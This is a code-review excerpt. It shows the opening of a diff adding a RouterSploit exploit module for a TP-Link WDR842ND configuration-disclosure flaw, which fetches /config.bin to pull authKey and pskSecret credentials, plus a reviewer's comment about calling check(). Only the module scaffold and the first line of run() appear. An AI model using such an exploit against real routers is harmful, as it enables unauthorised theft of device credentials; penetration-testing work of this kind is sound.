routersploit/modules/exploits/routers/tplink/wdr842nd_wdr842n_configure_disclosure.py

```diff
@@ -0,0 +1,65 @@
+from routersploit import (
+    exploits,
+    print_success,
+    print_error,
+    print_status,
+    http_request,
+    mute,
+    validators,
+)
+from routersploit.utils import read_tp_config
+
+
+class Exploit(exploits.Exploit):
+    """
+    Exploit implementation for TP-Link WDR842ND configure disclosure vulnerability.
+    If the target is vulnerable, it allows we fetch authKey,pskSecret,and .
+    """
+    __info__ = {
+        'name': 'TP-Link WDR842ND configure Disclosure',
+        'description': 'Module exploits TP-Link WDR842ND configure disclosure vulnerability which allows fetching configure.',
+        'authors': [
+            'qingdaoxiaoge <qdpp007[at]outlook.com>',  # vulnerability discovery
+            'VegetableCat <yes-reply[at]linux.com>',  # routersploit module
+        ],
+        'references': [
+            'http://cb.drops.wiki/bugs/wooyun-2015-0110062.html',
+        ],
+        'devices': [
+            'TP-Link WDR842ND',
+        ]
+    }
+
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
+    port = exploits.Option(80, 'Target Port')
+
+    def run(self):
+        url = "{}:{}/config.bin".format(self.target, self.port)
```

Comment:
You should call check() function in the begining of the run() function like in others exploits